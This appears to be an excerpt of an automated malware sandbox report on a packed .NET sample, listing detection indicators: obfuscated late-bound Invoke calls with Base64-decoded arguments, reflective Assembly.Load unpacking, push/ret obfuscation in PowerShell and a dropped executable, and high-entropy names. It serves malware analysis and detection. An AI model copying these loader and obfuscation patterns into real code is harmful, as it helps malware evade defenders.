Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{a6UpppHNRxSOwFcgWTFypIQJzokDR7B[2],I04X8xDLq2CNC4Xt.dLHwxyAABRab2QoULqz8D6POvvahfDr50ToECWJW3lzSFx1Gz(Convert.FromBase64String(a6UpppHNRxSOwFcgWTFypIQJzokDR7B[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { a6UpppHNRxSOwFcgWTFypIQJzokDR7B[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.JBFr2lxwyEMI0iTiKCjS8fuU5h7XkgR4NDWE26tv4nSIyLd4jRPmVfADJNttFqq3NBBci6xofCpWASDq0tKbRzWlM,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA._6ZDZhICuEhWTGvAxz2jqhE6iu8edJouIX8TWdmqV84k4NuZ9Zc1wlMrlqE0S3NTDlt7372JxyiaYj91L2oRihgjzI,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.cfQeVGHxJGqmYUT8INMLBymqCiFn0OCqGiZ6U1KJxNzzSLwuZLzvJe95MnI8n1z3x77QbeEcrTVfFG7HCzUr4JuNv,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.MsVRzXdvg0dbfswZounVL1RrjGkZ2Uv5mSsgYbtEjs6KqKILpwZLeuNYOC3o3fYezgaAaU0S34yGGZK98ku6oAHj8,I04X8xDLq2CNC4Xt.dqijtBKsHhfTMqRq()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{a6UpppHNRxSOwFcgWTFypIQJzokDR7B[2],I04X8xDLq2CNC4Xt.dLHwxyAABRab2QoULqz8D6POvvahfDr50ToECWJW3lzSFx1Gz(Convert.FromBase64String(a6UpppHNRxSOwFcgWTFypIQJzokDR7B[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { a6UpppHNRxSOwFcgWTFypIQJzokDR7B[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, l34GXL5vNW82bgMJ5l.cs	.Net Code: aa6VrBLE1I System.Reflection.Assembly.Load(byte[])
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: wkAIiThNH8epac4Ok3Gy0sk1E1UyokG System.AppDomain.Load(byte[])
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: m3CkXr9hliE2mWQYjvZHmsS2mpGT0y9 System.AppDomain.Load(byte[])
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: m3CkXr9hliE2mWQYjvZHmsS2mpGT0y9
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, l34GXL5vNW82bgMJ5l.cs	.Net Code: aa6VrBLE1I System.Reflection.Assembly.Load(byte[])
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: wkAIiThNH8epac4Ok3Gy0sk1E1UyokG System.AppDomain.Load(byte[])
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: m3CkXr9hliE2mWQYjvZHmsS2mpGT0y9 System.AppDomain.Load(byte[])
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: m3CkXr9hliE2mWQYjvZHmsS2mpGT0y9
Source: 0.2.yt7dW9nyJK.exe.4c90000.4.raw.unpack, Qq.cs	.Net Code: Md System.Reflection.Assembly.Load(byte[])
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, l34GXL5vNW82bgMJ5l.cs	.Net Code: aa6VrBLE1I System.Reflection.Assembly.Load(byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_033A6338 push eax; ret	6_2_033A6341
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_033A3AB8 push ebx; retf	6_2_033A3ADA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_02EF634C push eax; ret	8_2_02EF6351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_02EF15CD push ebx; ret	8_2_02EF15DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_087B7808 push eax; retf	8_2_087B7809
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA30EB push es; retf	11_2_04CA30F2
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA30E7 push es; retf	11_2_04CA30EA
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA3031 push es; retf	11_2_04CA3032
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA9290 push esp; retf	11_2_04CA9291

Source: yt7dW9nyJK.exe	Static PE information: section name: .text entropy: 7.980169660583914
Source: ffmaba.exe.4.dr	Static PE information: section name: .text entropy: 7.9803968726190435
Source: ffmaba.exe.11.dr	Static PE information: section name: .text entropy: 7.9803968726190435

Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, MoLs8m78ESt4YD6gORW.cs	High entropy of concatenated method names: 'PX12BvorUO', 'C4o2JnRMQh', 'r2L2r7xD58', 'toN2fC5Wen', 'YMg2yltSHY', 's1P2gc5u0a', 'PWX2Qp3X1W', 'LWj2win8h0', 'o2K2FopRZZ', 'h6t2mTw3Y4'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, FNiqGIzN6YouuO6eE2.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Bdy2WxTA4N', 'BMG2N8BmFA', 'p7v24wIujM', 'A202E0YrFb', 'LIi2Uka6SE', 'c1A22ykXVi', 'G202PAVMZa'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, LjKFJcGnQbFpADmDEj.cs	High entropy of concatenated method names: 'km2WwQ70in', 'y6xWFdr0d8', 'aoDW0AmBUt', 'SLBWeXlsfN', 'RaMWRNdhd2', 'eBWWO26XOQ', 'DZnW3ueKDe', 'Jg9WIFHQLi', 'Q1gW9oB2HQ', 'FyUWn6yR51'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, h82OGR39MMrSWBIeuA.cs	High entropy of concatenated method names: 'aQCYodnlRF', 'QcKYuyexsS', 'v5bYjPCIvt', 'ofQjpcyWju', 'y63jzfsrE2', 'kkTY8hPSeq', 'sguY7BnRpi', 'jGvYqKWso0', 'clHYTi8Zkj', 'iNTYVb7tjV'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, l34GXL5vNW82bgMJ5l.cs	High entropy of concatenated method names: 'UF1TLxvbsG', 'oysTolclHI', 'BciTa0ISyD', 'gMaTu3KLgD', 'CxLTC6iOoQ', 'HYwTjIQnLJ', 'Ta4TYGZ5Bn', 'CXdT5eNhSg', 'e1wTA0Rfac', 'JKuT1oA9rK'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, NbgqbDZfxTd3FhSpvT.cs	High entropy of concatenated method names: 'yLRE1UCvOh', 'ECiEllMjFP', 'ToString', 'O1dEoTsDIF', 'xxrEaCxlNA', 'l7PEu4kxqH', 'cM9ECgX277', 'rhpEjaqCbr', 'CiQEYKc9Hv', 'CHmE5HyWOL'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, zdH4f3pZmi7p2yCYxr.cs	High entropy of concatenated method names: 'GMS27pPDVk', 'W9S2T6QG6J', 'W4Y2VIGNsX', 'mcA2o6EFWh', 'kLt2aiSiRV', 's6b2CfKRSP', 'sIC2jWDSn5', 'ds6UbPmWGq', 'ntYUt3svsJ', 'PsQUxceNFm'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, oXGlh9FSyLkQpmpfLu.cs	High entropy of concatenated method names: 'MTCufcZTvO', 'NLsugyf3Eg', 'GuvuwFipOO', 'GrIuF13IR0', 'wG2uNw11e8', 'ouou4YmcdU', 'nOluEX9uIq', 'F4quUKVEoE', 'GE0u22hFAC', 'cXauPjbimg'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, olC9lOqWPHK88HFMTE.cs	High entropy of concatenated method names: 'YJ9ragJM3', 'anbfEj16D', 'zOlgfviRF', 'rqlQEadjb', 'cVGF9J5p7', 'y1cm5DtEO', 'g0rVuWbOsq7VjDtaMV', 'qtv2YGJBDSBaQby2wS', 'AEtUabICU', 'sRFP2SGhQ'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, dsMWdeSqEmuJJIBpLr.cs	High entropy of concatenated method names: 'CG0YBu00KD', 'zklYJyL38P', 'KQ6YrL2JU1', 'fITYfrhZoZ', 'TtXYyIIJMn', 'BSiYggur3S', 'lQMYQGlSbT', 'ed3YwddFDb', 'tSuYFECl2w', 'JfnYm7ycax'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, uU2UPPwPJLQsRsHPyp.cs	High entropy of concatenated method names: 'K8bakFXkKZ', 'aHZadickmp', 'F4aaMf64eX', 'BhIaZk8UTC', 'ibwahgO6O0', 'JLJasXs2PT', 'SeKabawUaj', 'wQBatoCFQq', 'UbBaxeEIXK', 'ewqapcLkl4'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, nKKY7Tt52faTCddFBg.cs	High entropy of concatenated method names: 'SBSUo1KaLl', 'JE4UaZaCdk', 'pHRUuVjdHy', 'Y9QUCR08uL', 'k0XUjatQUA', 'z1BUYn0NLC', 'hdeU5tSjgW', 'c84UAqCl8X', 'Oa8U1SNUH9', 'VN8UloAy0X'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, JMKYPcVyVq6QH7wK0M.cs	High entropy of concatenated method names: 'AwK7YU2UPP', 'sJL75QsRsH', 'NSy71LkQpm', 'YfL7luvQhm', 'DW47N7VHoO', 'lA874rKYot', 'DykncXe1DPyJNrZiSR', 'RtCXchC4o1b5pCmxSd', 'dES77nfkCG', 'CQc7TMUTS0'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, vQhmVZmG0JZtewW47V.cs	High entropy of concatenated method names: 'PBHCyScG2K', 'JkJCQwxVgH', 'Pu3uXEEA6t', 'TcQuRNvpPU', 'HOTuOoMn6N', 'JPluHiqT6D', 'fG8u35ZDOj', 'wM1uItaaPe', 'EBvuSXEuTi', 'onHu99LD9d'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, wShyhrkNG0qWJND3Sv.cs	High entropy of concatenated method names: 'lnMN9CUUus', 'nTBNiSvUGg', 'jlWNkM5fGF', 'QsENdIWUnL', 'OdtNevoXJb', 'YcbNX7aqsq', 'Kw7NRMGqP5', 'KO1NOeGo6v', 'C4vNHmaiky', 'SkuN3wGLFh'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, G3L0NIMHLFjsoLjt29.cs	High entropy of concatenated method names: 'ToString', 'pSJ4naaqUe', 'GvO4eiBVS5', 'yiQ4XEVtpL', 'D7y4R3S8HV', 'GtW4OCnx3H', 'PEx4HJ37AP', 'WU343KoRJs', 'OsW4IFdY78', 'YE14Slpm0l'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, KoO1A80rKYoteG0Jem.cs	High entropy of concatenated method names: 'D6JjLOwBIV', 'sRQjaXeeFx', 'frsjCDARpR', 'Tj9jYDhiqR', 'gLFj5U9Zfv', 'xoIChs4tMH', 'HcHCsU1kvt', 'bT0Cb00YIx', 'CehCtdLHex', 'cXwCx2dAnj'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, wqc7bO7TnM3ZX08JehS.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zjYPkP66Zs', 'm0EPdc6DZB', 'm5IPMN4xnB', 'MRxPZOTs7K', 'zrhPhcLC67', 'ItsPsfhAoc', 'Y6mPba9wcO'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, nlGFpdxwrdyqFjguXl.cs	High entropy of concatenated method names: 'zlVU0MQN0c', 'x3BUepLnuX', 'amtUX2mlr8', 'HwaURh0qSQ', 'SnBUkcCZQp', 'gy2UOSaxAg', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, AdPDqvax914xQbRvHH.cs	High entropy of concatenated method names: 'Dispose', 'JGk7xaFTe6', 'HRNqemSJwU', 'UnZRRN7Sk1', 'dlK7pKY7T5', 'sfa7zTCddF', 'ProcessDialogKey', 'xgWq8lGFpd', 'Drdq7yqFjg', 'hXlqqrdH4f'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, asEp2FfC6uaqQkU7N03Xi7aMe7aH4UsqyvczX1pV8VNDEBWL6.cs	High entropy of concatenated method names: 'j9pYh7fqUtxAzfvnbuJUiOYCEky35MZza4ejy2YYNk96bR44B', 'q1AkQ9L5Ua31gmqDu5aPF3y22uEixfb6ZlGjhoexTZd0qLmZh', 'XXD17AbScLYXpeQx98rahzkAsurbeSScr7tDFtieaoG0hQF5K', 'KL3JvinUZD63lB8cBE5fll4PbD', 'hYodKkMjQwXPC9IRhVwgMwm9D5', 'M56aYRhAnyH1lN7hW7LmazOpIC', 'xtOX9br7PfuNPsxA9oqCuKteVy', 'SSi8CSEb2hT4pPBGrikeSsnWAQ', 'zHefGITeBicsks60NE9F5AYnfi', 'qldqlcyo8chVirjGfIBaIl2z2k'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.cs	High entropy of concatenated method names: 'ieoX6VrIxwtQ0f6IPxj01vCOfctxZ5l6ZE0NvjtWknPtwpRYdYVzrRYWzPIGg8WIpwMdndemoXhCbI312', '_38BK1I5SoyOeEOjEuO7IxVars2OjcCgHsEjdqW3FfcNI2nSdSoA6Ny145ZLv2Y3QgnwJUsVZr65zqEbwl', '_86Z1aL9PQfmCZRDJ4oCkARjvaFgfIzRELcAJ1Nc2Iya8HtkxUzVCRA51ZAwGkCudIKGTEzLPQ8p5E1aJL', 'Mps3WRSJwGfNLmVfvSnuZNM6KiMx9FTS0JuyrnTow0MedbgjopKaGEuXs8Qd6ua0ITPnSn0i4FjTd2utM'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, RHrnabkqggf8x5IBqT2LD4ylWiCt2ceO1BQW7adWJ6d509VvOr5xQjaZtlyl9w24v2t1BcynkEhMKVNrepe12LKHR.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'AmkRhiq4pVi2iBvBtP2Bwybsvw65KyK3nCe2860OnGUeTrID2BvBcIVUop8t2pCQvdZOFbzoqsT8FrjSv', 'nJI63nP0qabprjzbDKLQTo24cK9H5b9buvOuCJHijpfhJxmY3YhhQJN2VvGF49INiiJZJkXYitl4O0M8f', '_8srhG0pKEeotPLJFpLjfJZfJIBLhT6CIGM5JqaWtOsFmkiSNqU3ceC9ZHGaCZxsYf5CHU5wwo5s5AElzL', '_6SZXnXIgpwUuaKA1cu8jnBIxvt2YcOEh500Uas57Q5zd2UXkdXEZZatZP9tV5tPpLuTtJNujdJ8bTSYhR'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, TObVbKys0GgFW4VOqJ2ZBssSxFQuDu4.cs	High entropy of concatenated method names: 'qUJlaYtxtF3DbhjY', '_99flffu2gimXsrEvebANqrnCeLyGXDPlUR2jFNroY7z0SkWIpjEoL9v1wLRRFYStaERNXiDzM7KYmJrepx36sjnte70k7yL9GR', 'HOwVothBZbpt3MhCNzc7vZd4HU9mMZAhgshlneBdv2h5ZbK9DFVm3a2qSrciZ0OwL8Oot59rmHBc6yFuLEOTTygwL43snDyxD6', 'YlFRwAvV4R41VmGHmOT32RhVbtjp7b27d3dxRiFkqlcbCluFZexiefjrnsuljXYiTSB9yEbjVHaDopCdVjsydlt8udD1Sk5pmK', 'jcnMb4QQhDa5eCURI8L9eKMDayfrk94eDSxDyXY75Sxcgu1P5dwYXn8DvDfYnXcmvhNdVZSEprhGsDr7cLdf0KQEFyVB0nTWYy'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, FNmlZ2aTo37rTj5achFuQvwVWWjwciW.cs	High entropy of concatenated method names: 'bE6Skcym1E8q1JpQvrrx3A2mPNyEYmA', '_48a39vrGguHmHwaVwCYAXZzl4LFopMc', 'KCB2eIA3VC5QdcTQ7vcWdKgaQ7sBGeN', 'sfRlsl7nZqZfuf0SM1QN7yUx75H53Rh', 'XqXnqcxyHckdUfZccMZiGWEtvihJFaC', 'CumF6z080eUonkPpjiEt8hXsb7DITXb', 'n1xP1ZOmmaiWJwC1ugklwqoJ9HSjjAZ', 'kwM3uET4iWbN6eslWcLIYG7tJxzzeK0', 'Xff0w9u7Bfzj323rrg1udqMDCrc859R', 'Hv0sdAhGuJ7WgE8AEe4vW19hUFftosp'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, I04X8xDLq2CNC4Xt.cs	High entropy of concatenated method names: 'L5f6jbsrgh8yYymy', 'ggsKYphZwRQlM9am', 'Ph8AevJTp2T7ku20', 'IZCHUE2BDP769cUK', '_30rMMePn4gqbT3MH', '_6HZ8rTmwlKI6LdOE', 'r6MU5kcfW4EjU7lv', 'dCKW9WrLdnh9EaZV', 'cCVgQOQCfSUo347X', '_46XjgzRDLUSXjJjo'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, 46Vktqg7CAqVoJ3pXlNy6niu94YrpPriQQA765ga1y8jmqBJ9nrC0PNeoqVxX5rB8GTaZOIbxholzAhW49uLNc62H.cs	High entropy of concatenated method names: 'QS5snepBdQqcCOHSQp7wjYIBy9LdLD9JeyjCxuIbYWVwJ8jOguYWzcEYOC4LkBruRMAZhszhYztkH84KxhUkBmDzV', '_8VMPhDzpud4K0D4TquEusHJXknWPp7fke5kLaX1wtC0z6RrzbmqhggU9TgpCzBalnWms12hoRs1GdRw6jJwpKDU0Q', 'YBwBC1vWAUZiHjfk8nlWB5TcSRA3oPClfq6cPLrfFkoZD0CwZLN6fcGYrg2DOmIWL8fXIbXVLEWwreT4mJumY5zT7', 'zSUF79XylEJaKsEdJqtLmyb0MSbrsRFB8XsPazAu1IuUs2ZXHZkJGI31Vr4YG4yWGX1UfDD2SFJAv7sVINYQS9IW4', 'nqyYJVzhH9i1KcWmyuaLVZXlO6uZcbtvsbE9b2Y0AKTbQisK6v8LvtwrKfkcKfpCz3z567Dtj9DC5UsxsdkEN6ava', 'dCvu9PJyf7MfVS1Npc3fjhG4LSnT13v7ZN2PeUNDI9POEyjyIRUvYcaF3ABpvbu33ocVz90ihZhBEfF5BN74LMJSJ', 'JT9wDkQa6v6BdWcpbWa9WMRL3vomRHBYI0vfMhCmDg6lI1Ww2tVtA3m7AzfQA8flQbppxXKI3INXriEyYsqCUqVSq', 'SqFODOrdzvoFFQEH3vzqJpRU1o5IAywpH5Vy0K3IWfcxtEZpgEmkrLtqIsjRSB9QFq7ByCwUKbdO9S9hhRn7HeYHX', 'pGosDhHzyNeePTKPyTwr9m1xQ7KPu7GqfgyuwDSXCMZXF9hdeckF9CRPraIcI2VjcsGqlCzItThdntkZfUi85xgYx', 'KVcOKWHq70Jo70xfPEvBXDyLWzeapKnSm6ZqpwSQo4jmCd3aG92qkTHeMx612ghHxliNVcFiSakEsgUs2CX9VXuqS'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, IklJR9Egrci7AkoDGmrtlQz9KpfApOw.cs	High entropy of concatenated method names: 'Poc96CYK8OSv52z26hmXZfOp7tWv8TF', 'ExuBL3pMYZSl9913WmNbxDZhYMOjBN6', 'ecPnLK2QepjkslfNCNM1nmU9Zaz6qQu', 'rOn9thVJbMyWyrQ7urXne23OOfLKV2DnfdDEKYSs33EFmusn9TAHdExLeOqe0WnzQ0W3yUxX3hlrORKwlSbnSbxfYxFny93zD2', 'n1Kt8jjnVKwMzP4XvhIWNdjNoiHo380FoO5AfnzYBQsb2S5BSVVwbEgpADjXymXkk2K5MFA1JwtoQOkD2maMetNhc4ey4z0sra', 'bNvU1zkRVYVglK41nyb6EyKDl0mRGa5rSs56jXXGb5FkVeHpLeAaWAX3uXAbHPkPKIXiAkmCO5YJNWmTBPOmEEmQvsRvVEAT3J', 'EaUqAvoIBKIqK7lROQeEZKTApSVnfkl3jzK0Gs3HoXgVMEZssVglXUsgK8TOUzDwElRPPqWHnWsQlL2JNoOtI4Oo16AdBQ5lPa', 'GWSgsyBxh2AdxW4HIL87cGlfJCD1VRlsSaUSET9aSS7BZJXNTWSzviaSJHzSRN2HATJlo9RkRUlsrN32NWN0oocgt12kBeBEIN', 'dQojCAMlnWTBRn4ep59rv6Yy8JDR8lKfOz8mGgStmHyugnuDELiXXOy98H1uqD69PCfzjXK5L7IvLA9RXX6r9f4YruF6Ylwfgc', '_9Q0ogs17qwzhJbUyXr16HTr3BRGn4QvnoHycknKeIUDOFNZVnxlnQr5ljgSNWmkKwKTVjpEqIiDYjAKNpdwaApjPDu4jGxpZL5'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	High entropy of concatenated method names: 'f6umHbcSKUEeCW91ooOAfJl9PjsmMaH', 'wkAIiThNH8epac4Ok3Gy0sk1E1UyokG', 'mJQi8aQlYBH680bsbDAcLkSWUticyzq', 'YDaJPmh0IV3zBUCXDBCT901fLwqEdOm', '_5MZAwH4gj3KSlo2yJJoL5thDudhywuf', 'gha1t9V6cwzsPueRtGncNgrVjVWduZI', 'RmzNMxHPsPlMoCYGw4xljeH3pUmG1D1', 'vKORDnbaXqyihIjqVcVn6FuJuirt36x', 'e0socU8SbuUz6ZcaJsyGEJcP8BpPuea', '_9kxN9kzg5bQyCJ2LwwMR8FggoKWuSzf'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, rlPW4lL6JzpBKG5uTpUgtMKAdxQudep.cs	High entropy of concatenated method names: 'kBIJXv5a6rottIG83i4vMNxD8FeQAsJ', 'UXPzojRBKx1Oqz9xM4hqjeBMRGFhilZb0DpPekrUZrUFBwX4Z6QKRfIR8Q6VLG5yCxn4FdHJAk7DF12DySdVEngK8AbS6420Ua', 'N93RaNm3kVfs5sBwuxwa1snrEURzE4gpyKg3PFeRmsWQ9grkjjjD6u8KC4NOAbTgcEFuj1CrJWLrxbiBtYbrDDtY1SSUUupQr9', 'XGroXQIR91D3l4CCUv1lCuJWuRjTdcWOzPqUdCqRyHMdqmHUR0ueHXMI2rBwVL1VXstJIcfgV1hQJu7FIn7U6ueRyPjsNM3EI2', 'BqnIh4cGt3g5rOqBfzaULbx9adX0obHUPSD6WWd285Qc4G9Lax9PXlcBSFQtHOvaF5dDdTN9DNl6QLUPu8fh16LhQmfiOzzPBt'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, MoLs8m78ESt4YD6gORW.cs	High entropy of concatenated method names: 'PX12BvorUO', 'C4o2JnRMQh', 'r2L2r7xD58', 'toN2fC5Wen', 'YMg2yltSHY', 's1P2gc5u0a', 'PWX2Qp3X1W', 'LWj2win8h0', 'o2K2FopRZZ', 'h6t2mTw3Y4'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, FNiqGIzN6YouuO6eE2.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Bdy2WxTA4N', 'BMG2N8BmFA', 'p7v24wIujM', 'A202E0YrFb', 'LIi2Uka6SE', 'c1A22ykXVi', 'G202PAVMZa'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, LjKFJcGnQbFpADmDEj.cs	High entropy of concatenated method names: 'km2WwQ70in', 'y6xWFdr0d8', 'aoDW0AmBUt', 'SLBWeXlsfN', 'RaMWRNdhd2', 'eBWWO26XOQ', 'DZnW3ueKDe', 'Jg9WIFHQLi', 'Q1gW9oB2HQ', 'FyUWn6yR51'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, h82OGR39MMrSWBIeuA.cs	High entropy of concatenated method names: 'aQCYodnlRF', 'QcKYuyexsS', 'v5bYjPCIvt', 'ofQjpcyWju', 'y63jzfsrE2', 'kkTY8hPSeq', 'sguY7BnRpi', 'jGvYqKWso0', 'clHYTi8Zkj', 'iNTYVb7tjV'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, l34GXL5vNW82bgMJ5l.cs	High entropy of concatenated method names: 'UF1TLxvbsG', 'oysTolclHI', 'BciTa0ISyD', 'gMaTu3KLgD', 'CxLTC6iOoQ', 'HYwTjIQnLJ', 'Ta4TYGZ5Bn', 'CXdT5eNhSg', 'e1wTA0Rfac', 'JKuT1oA9rK'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, NbgqbDZfxTd3FhSpvT.cs	High entropy of concatenated method names: 'yLRE1UCvOh', 'ECiEllMjFP', 'ToString', 'O1dEoTsDIF', 'xxrEaCxlNA', 'l7PEu4kxqH', 'cM9ECgX277', 'rhpEjaqCbr', 'CiQEYKc9Hv', 'CHmE5HyWOL'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, zdH4f3pZmi7p2yCYxr.cs	High entropy of concatenated method names: 'GMS27pPDVk', 'W9S2T6QG6J', 'W4Y2VIGNsX', 'mcA2o6EFWh', 'kLt2aiSiRV', 's6b2CfKRSP', 'sIC2jWDSn5', 'ds6UbPmWGq', 'ntYUt3svsJ', 'PsQUxceNFm'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, oXGlh9FSyLkQpmpfLu.cs	High entropy of concatenated method names: 'MTCufcZTvO', 'NLsugyf3Eg', 'GuvuwFipOO', 'GrIuF13IR0', 'wG2uNw11e8', 'ouou4YmcdU', 'nOluEX9uIq', 'F4quUKVEoE', 'GE0u22hFAC', 'cXauPjbimg'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, olC9lOqWPHK88HFMTE.cs	High entropy of concatenated method names: 'YJ9ragJM3', 'anbfEj16D', 'zOlgfviRF', 'rqlQEadjb', 'cVGF9J5p7', 'y1cm5DtEO', 'g0rVuWbOsq7VjDtaMV', 'qtv2YGJBDSBaQby2wS', 'AEtUabICU', 'sRFP2SGhQ'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, dsMWdeSqEmuJJIBpLr.cs	High entropy of concatenated method names: 'CG0YBu00KD', 'zklYJyL38P', 'KQ6YrL2JU1', 'fITYfrhZoZ', 'TtXYyIIJMn', 'BSiYggur3S', 'lQMYQGlSbT', 'ed3YwddFDb', 'tSuYFECl2w', 'JfnYm7ycax'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, uU2UPPwPJLQsRsHPyp.cs	High entropy of concatenated method names: 'K8bakFXkKZ', 'aHZadickmp', 'F4aaMf64eX', 'BhIaZk8UTC', 'ibwahgO6O0', 'JLJasXs2PT', 'SeKabawUaj', 'wQBatoCFQq', 'UbBaxeEIXK', 'ewqapcLkl4'
